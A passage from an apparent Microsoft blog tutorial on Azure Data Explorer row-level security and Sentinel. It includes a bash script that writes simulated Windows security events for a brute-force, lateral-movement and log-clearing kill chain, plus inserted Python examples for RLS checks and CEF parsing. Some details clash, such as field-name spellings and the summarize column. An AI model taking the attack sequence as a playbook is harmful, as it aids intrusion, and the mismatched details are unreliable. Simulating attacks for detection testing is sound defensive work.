height="14px">Erik</TD> <TD width="13.089509143407122%" height="14px">ProcessCntrlAsset</TD> <TD width="13.282001924927817%" height="14px">PCN_NTPSrvr</TD> <TD width="6.833493743984601%" height="14px">611 Lab</TD> <TD width="10.39461020211742%" height="14px">192.168.1.80</TD> <TD width="10.68334937439846%" height="14px">PCN-1</TD> <TD width="17.805582290664102%" height="14px">{userB@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">IL611</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 
14.5pt;">MFG_IL6112</TD> <TD width="13.763233878729547%" height="14px">Erin</TD> <TD width="13.089509143407122%" height="14px">Engineering Wkstn</TD> <TD width="13.282001924927817%" height="14px">S7EWSBldg6</TD> <TD width="6.833493743984601%" height="14px">611 Bldg</TD> <TD width="10.39461020211742%" height="14px">192.168.1.81</TD> <TD width="10.68334937439846%" height="14px">PIN-1</TD> <TD width="17.805582290664102%" height="14px">{userB@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">IL611</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_IL6114</TD> <TD width="13.763233878729547%" height="14px">Elan</TD> <TD width="13.089509143407122%" height="14px">PLC</TD> <TD width="13.282001924927817%" height="14px">RTC_06</TD> <TD width="6.833493743984601%" height="14px">611 Site</TD> <TD width="10.39461020211742%" height="14px">192.168.67.81</TD> <TD width="10.68334937439846%" height="14px">SIM-1</TD> <TD width="17.805582290664102%" height="14px">{userB@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">IL611</TD> </TR> </TBODY> </TABLE> <LI-SPOILER><BR />In the Plant_Owner column, add a user from one of your RLS restricted security groups for userA, and from the other RLS restricted security group for userB.</LI-SPOILER> <P>Once you create and save this .csv, you can upload it to ADX:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_5-1633126241990.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314500i5F5EAA307BF5C4BD/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_5-1633126241990.png" alt="Beth_Bischoff_5-1633126241990.png" /></span></P> <P>&nbsp;</P> <H3><STRONG><U>Build policies for restricted access</U></STRONG></H3> <P>After your ingestion has succeeded, you'll build the Row Level Security Policy under "Query."</P> <OL> 
<LI>Create the function that filters the table:</LI> </OL> <P>&nbsp;</P> <LI-CODE lang="sql">.create-or-alter function with () Plant_Data() {
    let IsInGroup1 = current_principal_is_member_of('aadgroup=adxrls1;{tenantID}');
    let IsInGroup2 = current_principal_is_member_of('aadgroup=adxrls2;{tenantID}');
    let DataForGroup1 = CMDBData | where IsInGroup1 and site == 'IL611';
    let DataForGroup2 = CMDBData | where IsInGroup2 and site == 'MI22';
    union DataForGroup1, DataForGroup2
}</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <LI-SPOILER> <P><FONT size="2">{tenantID} - is your AAD tenant ID (from the AAD Overview screen),</FONT></P> <P><FONT size="2">Plant_Data() - is the&nbsp;function name (on which you’ll enable the RLS policy),</FONT></P> <P><FONT size="2">CMDBData - is the&nbsp;original table that you created to ingest data, and</FONT></P> <P><FONT size="2">site == 'IL611'; site == 'MI22'; - are the keys for the permissions filter (use straight quotes; curly quotes from a word processor will not parse).</FONT></P> </LI-SPOILER> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_0-1633126746113.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314502i94D3691B1EF60194/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633126746113.png" alt="Beth_Bischoff_0-1633126746113.png" /></span></P> <P>&nbsp;</P> <P><FONT size="3">2. 
Create the RLS (Row Level Security) Policy based on the function above:</FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">.alter table CMDBData policy row_level_security enable 'Plant_Data'</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <LI-SPOILER> <P><FONT size="2">CMDBData - is the original table that you created to ingest data, and</FONT></P> <P><FONT size="2">Plant_Data - is the function name on which you'll enable the RLS Policy.</FONT></P> </LI-SPOILER> <LI-SPOILER> <P>Note: Once a policy has been defined, only users explicitly granted permission to access the data via the filters defined in the query will be able to read any data from the tables.</P> <P>To enforce the policy only at runtime and keep the data available to others while testing the function, use the format:</P> <P>set&nbsp;query_force_row_level_security; Plant_Data</P> </LI-SPOILER> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_1-1633127178224.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314504i06B54F24119586B7/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633127178224.png" alt="Beth_Bischoff_1-1633127178224.png" /></span></P> <P>&nbsp;</P> <P>From here, you're ready to test the policy with the saved function name. 
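</P> <P>Before logging in as a test user, it helps to have the policy's logic somewhere you can check without touching the cluster. The Python below is an added example (not the post's code and not ADX itself) that models Plant_Data() over the sample CMDB rows: a caller in adxrls1 sees the IL611 rows, a caller in adxrls2 sees the MI22 rows, a caller in neither group sees nothing at all, and a caller in both sees the union. It also renders the extra branch the post leaves unshown, an unrestricted group for the SOC; the group name adxsoc, the tenant ID and the user principals are assumptions.</P>

```python
"""Added example: an offline model of the Plant_Data() row-level-security
function from this post, so you can check who sees which rows before enabling
the policy. Not the post's code and not the ADX engine; the CMDB rows,
principals, tenant ID and SOC group name are constructed."""

TENANT_ID = "00000000-0000-0000-0000-000000000000"  # placeholder for {tenantID}
GROUP1 = f"aadgroup=adxrls1;{TENANT_ID}"            # sees site IL611 (as in Plant_Data)
GROUP2 = f"aadgroup=adxrls2;{TENANT_ID}"            # sees site MI22  (as in Plant_Data)
SOC_GROUP = f"aadgroup=adxsoc;{TENANT_ID}"          # assumed name for the all-sites SOC group

# Branches of the policy: group -> sites it may read; None means every site.
POLICY = {GROUP1: {"IL611"}, GROUP2: {"MI22"}, SOC_GROUP: None}

# Constructed subset of the CMDBData table from the post (same column names).
CMDB_DATA = [
    {"Geo": "MFG_MI224", "Hostname": "DC.domain", "IPAddress": "172.16.16.100", "site": "MI22"},
    {"Geo": "MFG_MI225", "Hostname": "DMZ_Workstation", "IPAddress": "172.16.1.4", "site": "MI22"},
    {"Geo": "MFG_MI226", "Hostname": "Ecart", "IPAddress": "158.81.67.141", "site": "MI22"},
    {"Geo": "MFG_IL6112", "Hostname": "PCN_NTPSrvr", "IPAddress": "192.168.1.80", "site": "IL611"},
    {"Geo": "MFG_IL6112", "Hostname": "S7EWSBldg6", "IPAddress": "192.168.1.81", "site": "IL611"},
    {"Geo": "MFG_IL6114", "Hostname": "RTC_06", "IPAddress": "192.168.67.81", "site": "IL611"},
]


class Principal:
    """Stand-in for the calling identity; is_member_of mirrors current_principal_is_member_of()."""

    def __init__(self, upn, groups=()):
        self.upn = upn
        self.groups = set(groups)

    def is_member_of(self, group):
        return group in self.groups


def plant_data(principal, rows=CMDB_DATA):
    """Rows the RLS policy returns: the union of every branch whose group the caller is in.
    A caller in none of the listed groups gets an empty result, not an error."""
    allowed = set()
    for group, sites in POLICY.items():
        if not principal.is_member_of(group):
            continue
        if sites is None:
            return list(rows)  # SOC branch: unrestricted
        allowed |= sites
    return [r for r in rows if r["site"] in allowed]


def visible_sites(principal, rows=CMDB_DATA):
    """Convenience view for a quick check: which sites does this caller end up seeing?"""
    return sorted({r["site"] for r in plant_data(principal, rows)})


def render_plant_data_kql(tenant_id, soc_group="adxsoc"):
    """The post's Plant_Data() function plus the unrestricted SOC branch (assumed group name),
    emitted with straight quotes: curly quotes pasted from a word processor do not parse."""
    return "\n".join([
        ".create-or-alter function with () Plant_Data() {",
        f"    let IsInGroup1 = current_principal_is_member_of('aadgroup=adxrls1;{tenant_id}');",
        f"    let IsInGroup2 = current_principal_is_member_of('aadgroup=adxrls2;{tenant_id}');",
        f"    let IsInSoc = current_principal_is_member_of('aadgroup={soc_group};{tenant_id}');",
        "    let DataForGroup1 = CMDBData | where IsInGroup1 and site == 'IL611';",
        "    let DataForGroup2 = CMDBData | where IsInGroup2 and site == 'MI22';",
        "    let DataForSoc = CMDBData | where IsInSoc;",
        "    union DataForGroup1, DataForGroup2, DataForSoc",
        "}",
    ])


if __name__ == "__main__":
    for who in (Principal("userB@domain.com", [GROUP1]), Principal("userA@domain.com", [GROUP2]),
                Principal("guest@domain.com"), Principal("soc@domain.com", [SOC_GROUP])):
        print(f"{who.upn:>18}: {visible_sites(who)}")
    print(render_plant_data_kql(TENANT_ID))
```

<P>Once the policy is enabled, remember that a principal in none of the listed groups gets zero rows rather than an error, which is easy to mistake for an ingestion problem; checking a test identity against this model first tells you whether an empty result is the policy working or a group membership that has not propagated yet.</P> <P>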
Log on with one of the identities belonging to one of the restricted-access security groups that you created earlier, and you should see only the data associated with that user's group's site access.&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_1-1633205868024.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314610i7A3C04C8FBAE3311/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633205868024.png" alt="Beth_Bischoff_1-1633205868024.png" /></span></P> <P>&nbsp;</P> <H3><STRONG><U>Ingest sample logs into Azure Sentinel</U></STRONG></H3> <P>For an added step, we would also like to align this with logs in Sentinel to ensure the sample works as desired. Using logger -p on a Linux collector, you can emulate a few activities that align to the IP addresses from the .csv file that you imported into your ADX cluster database.&nbsp;</P> <P>&nbsp;</P> <P>We've created a sample set that also serves as a sample kill chain in Sentinel. This can be saved and run as a .sh script for ease of reuse if desired. Otherwise, just copy and paste it on a CEF collector that's sending logs to Azure Sentinel.</P> <P>&nbsp;</P> <LI-SPOILER>This will also be useful for a follow-up blog post coming soon!</LI-SPOILER> <P>&nbsp;</P> <LI-CODE lang="bash">#!/bin/bash
# Emits a constructed kill chain as CEF events through the local syslog daemon.
# Each event uses the standard CEF extension key deviceExternalId (the Sentinel CEF
# parser maps it to DeviceExternalID; a misspelled key lands in AdditionalExtensions).
#NOW=`date '+%F %H:%M:%S'`;
NOW=$(date -u)

###Brute Force Attack###
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=StMarsh src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=KyBroflovski src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=KeMcCormick src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072 - account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=BuStotch src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"

###Sleep for 5 seconds###
sleep 5s
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=WeTestaburger src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=TwTweak src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=BeStevens src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072 - account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=BrBiggle src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"

###Sleep for 5 seconds###
sleep 5s
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=ClDonovan src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=CrTucker src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=JiValmer src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072 - account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=TiBurch src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"

###Sleep for 5 seconds###
sleep 5s
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=RaMarsh src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=ShMarsh src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=JiKern src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072 - account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=BrBiggle src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"

###Sleep for 5 seconds###
sleep 5s
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=GeBroflovski src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start=$NOW end=$NOW suser= duser=ShBroflovski src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=KySchwartz src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072 - account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalId=4625 start= end= suser= duser=JaTenorman src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"

###Sleep for 10 seconds###
sleep 10s

###Successful login to one of the Brute Force targeted accounts; 158.81.26.141###
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalId=4624 start= end= suser= duser=ErCartman src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain"

###Sleep for 30 seconds###
sleep 30s

###Login to 172.16.1.4(DMZ_Workstation)###
logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalId=4624 start= end= suser= duser=ErCartman src= dst=172.16.1.4 shost= dhost=DMZ_Workstation destinationDnsDomain=dc.domain"

###Sleep for 60 seconds###
sleep 60s

###Login to AD, change an existing IOT authorized user password, create new user account, added to IOT authorized user group, reset password;
172.16.16.100 (dc.domain)### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser=ErCartman duser=StMarsh-sa src=172.16.1.4 dst=172.16.16.100 shost=DMZ_Workstation dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 10 seconds### sleep 10s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4723 - An attempt was made to change an account's password|1|act=Failure deviceExternalID=4723 start= end= suser=StMarsh-sa duser=ErCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4720 - A user account was created.|2|act=Success deviceExternalID=4720 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4724 - An attempt was made to reset an account's password|2|act=Success deviceExternalID=4724 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 20 seconds### sleep 20s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4728 - A member was added to a security-enabled global group|2|act=Success deviceExternalID=4728 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain dpriv=dc.domain\IOT-Engineering" ###Sleep for 60 seconds### sleep 60s ###Login to Process control asset; 192.168.1.80(PCN_NTPSrvr)### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - 
RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser=ErCartman duser=LiCartman-IOT src=172.16.1.4 dst=192.168.1.80 shost=DMZ_Workstation dhost=PCN_NTPSrvr destinationDnsDomain=dc.domain" ###Sleep for 60 seconds### sleep 60s ###Login to Engineering workstation; 192.168.1.81(S7EWSBldg6)### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser=LiCartman-IOT duser=S7EWSBldg6\cooladmin src=192.168.1.80 dst=192.168.1.81 shost=PCN_NTPSrvr dhost=S7EWSBldg6 destinationDnsDomain= " ###Sleep for 120 seconds### sleep 120s ###Delete log traces - remove group membership, delete account, clear audit logs### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=cooladmin duser= src=dst=192.168.1.81 shost= dhost=S7EWSBldg6 destinationDnsDomain=S7EWSBldg6" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=LiCartman-IOT duser= src=dst=192.168.1.80 shost= dhost=PCN_NTPSrvr destinationDnsDomain=dc.domain" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4729 - A member was removed from a security-enabled global group|2|act=Success deviceExternalID=4729 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain dpriv=dc.domain\IOT-Engineering" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4726 - A user account was 
deleted.|2|act=Success deviceExternalID=4726 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=ErCartman duser= src=dst=172.16.1.4 shost= dhost=DMZ_Workstation destinationDnsDomain= " logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=StMarsh-sa duser= src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain= " </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <H3><STRONG><U>Build cross-solution workbook</U></STRONG></H3> <P>Now we're ready to build the cross-solution workbook in Azure Sentinel. The first step we recommend is to test your external data query in your Sentinel logs and then validate the IP address match to the sample CEF logs you ran above.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">adx("cmdbdata.eastus/CMDB_Sample").Plant_Data //(Name of Cluster, reference in adx database) | join (CommonSecurityLog) on $left.IPAddress == $right.DestinationIP | summarize count() by DeviceAction </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_2-1633206100588.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314611i270C5142199DF7A5/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_2-1633206100588.png" alt="Beth_Bischoff_2-1633206100588.png" /></span></P> <P>&nbsp;</P> <P>From here, you can create a new workbook to visualize the completely different access views to row level restricted data based on the security group to which each authenticated user belongs.</P> 
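<P>As an added example that is not part of the lab (the lab does this join in KQL against Azure Data Explorer), the Python below parses CEF lines in the shape the script above emits into the CommonSecurityLog column names Sentinel uses, inner-joins them with a constructed stand-in for the Plant_Data table on IPAddress == DestinationIP, and produces the Successful/Failed counts by DeviceEventClassID and DestinationIP that the workbook query computes. It also adds a small failed-then-success check for the pattern the script simulates. The sample events, the Plant_Data rows and their Asset/SecurityGroup columns are constructed for this example; only the IPAddress column is named on the page.</P>

```python
"""Added example (not from the lab): parse simulated CEF events, reproduce the
workbook's ADX join and summarize in Python, and flag failed-then-success logons."""
import re
from collections import defaultdict

# Constructed sample lines in the shape the logger calls above emit. Two of them carry
# the multi-word timestamp that `date -u` puts into start= and end=.
SAMPLE_CEF = [
    'CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=Tue Oct 19 17:44:37 UTC 2021 end=Tue Oct 19 17:44:37 UTC 2021 suser= duser=StMarsh src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain',
    'CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=Tue Oct 19 17:44:37 UTC 2021 end=Tue Oct 19 17:44:37 UTC 2021 suser= duser=KyBroflovski src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain',
    'CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=KeMcCormick src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain',
    'CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser= duser=ErCartman src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain',
    'CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser= duser=ErCartman src= dst=172.16.1.4 shost= dhost=DMZ_Workstation destinationDnsDomain=dc.domain',
]

# Constructed stand-in for the ADX Plant_Data table. Only IPAddress is named on the
# page; Asset and SecurityGroup are assumed columns for the example.
PLANT_DATA = [
    {"IPAddress": "158.81.26.141", "Asset": "dc.domain", "SecurityGroup": "IOT-Engineering"},
    {"IPAddress": "192.168.1.81", "Asset": "S7EWSBldg6", "SecurityGroup": "IOT-Engineering"},
]

# CEF header positions, named as CommonSecurityLog names them.
HEADER = ["Version", "DeviceVendor", "DeviceProduct", "DeviceVersion",
          "DeviceEventClassID", "Name", "Severity"]
# key=value pairs; a value runs until the next " key=" so multi-word values survive.
EXT_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
SUCCESS = {"Success", "Successful", "accept"}   # same spellings the workbook query accepts


def parse_cef(line):
    """Split the 7 pipe-delimited header fields, then the extension, and map the
    extension keys this example uses onto their CommonSecurityLog column names."""
    parts = line.split("|", 7)
    if len(parts) != 8 or not parts[0].startswith("CEF:"):
        raise ValueError("not a CEF line")
    rec = dict(zip(HEADER, parts[:7]))
    rec["Version"] = rec["Version"][len("CEF:"):]
    ext = dict(EXT_RE.findall(parts[7]))
    rec["DeviceAction"] = ext.get("act", "")
    rec["SourceIP"] = ext.get("src", "")
    rec["DestinationIP"] = ext.get("dst", "")
    rec["DestinationUserName"] = ext.get("duser", "")
    rec["StartTime"] = ext.get("start", "")
    return rec


def join_plant_data(events, plant_data):
    """Inner join, like the KQL: Plant_Data.IPAddress == CommonSecurityLog.DestinationIP."""
    by_ip = {row["IPAddress"]: row for row in plant_data}
    return [{**ev, **by_ip[ev["DestinationIP"]]}
            for ev in events if ev["DestinationIP"] in by_ip]


def summarize(joined):
    """Successful_Connection / Failed_Connection counts by (DeviceEventClassID, DestinationIP)."""
    out = defaultdict(lambda: {"Successful_Connection": 0, "Failed_Connection": 0})
    for ev in joined:
        key = (ev["DeviceEventClassID"], ev["DestinationIP"])
        if ev["DeviceAction"] in SUCCESS:
            out[key]["Successful_Connection"] += 1
        elif ev["DeviceAction"] == "Failure":
            out[key]["Failed_Connection"] += 1
    return dict(out)


def failed_then_success(events, threshold=3):
    """Destinations that saw at least `threshold` failed logons before a success, in
    ingestion order: the brute-force-then-login pattern the script simulates."""
    failures = defaultdict(int)
    hits = set()
    for ev in events:
        dst = ev["DestinationIP"]
        if ev["DeviceAction"] == "Failure":
            failures[dst] += 1
        elif ev["DeviceAction"] in SUCCESS and failures[dst] >= threshold:
            hits.add(dst)
    return sorted(hits)


if __name__ == "__main__":
    events = [parse_cef(line) for line in SAMPLE_CEF]
    for key, counts in summarize(join_plant_data(events, PLANT_DATA)).items():
        print(key, counts)
    print("failed-then-success destinations:", failed_then_success(events))
```

<P>Note that in these simulated lines the NTSTATUS reason sits in the DeviceEventClassID header slot and the 4625/4624 text in the Name slot, so summarizing by DeviceEventClassID groups by failure reason; the 172.16.1.4 event drops out of the inner join because it has no Plant_Data row, which is exactly the row-level restriction the lab relies on.</P>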
